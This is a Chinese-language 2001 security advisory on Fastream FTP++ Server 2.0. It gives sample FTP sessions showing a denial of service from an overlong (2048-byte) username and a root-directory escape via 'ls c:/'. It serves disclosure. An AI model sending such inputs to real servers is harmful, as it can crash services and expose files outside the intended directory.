发布日期：2001-01-27
更新日期：2001-01-27

受影响系统：

Fastream FTP++Server 2.0
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 2000

描述：

---

BUGTRAQ  ID:2261
CVE(CAN) ID: CAN-2001-0256

Fastream FTP++ Server是一个客户端/服务器应用程序，用来在internet上的计
算机中下载和上传文件。

SNS研究小组发现它存在多个安全漏洞：

1. 拒绝服务漏洞

  如果发送一个超过2048字节的请求，可能导致FaSTream内置的ftp服务器停止
  响应。
  例如：

   C:\>ftp victimserver
   Connected to victimserver
   220 Fastream FTP++ 2 Server Ready
   User (victimserver:(none)): aaaaaaaaaaaaaaaaaa(2048 bytes)
   此后，服务器仍然继续接受连接请求，但是不会再对提供的命令进行响应。

2. 路径泄漏以及目录浏览漏洞

   当ftp server的root目录被设置之后，任意能够访问ftp server的用户
   不仅能够看到此目录的路径而且可以突破root目录，得到其他驱动器和目录
   的内容列表。

   ftp> pwd
   257 "/C:/FTPROOT/" is current directory.
   ftp> ls c:/
   200 Port command successful.
   150 Opening data connection for directory list.

    (listing of c:\)

   226 File sent ok
   ftp: xx bytes received in x.xx seconds xxKbytes/sec.

<*来源：SNS Research （vuln-dev@greyhack.com） *>


建议：

---

厂商补丁：

厂商已经提供了FaSTream FTP++ Beta 10 Build 3，它解决了目录泄漏问题，
但是拒绝服务问题仍然没有解决。


浏览次数：4099
严重程度：0（网友投票）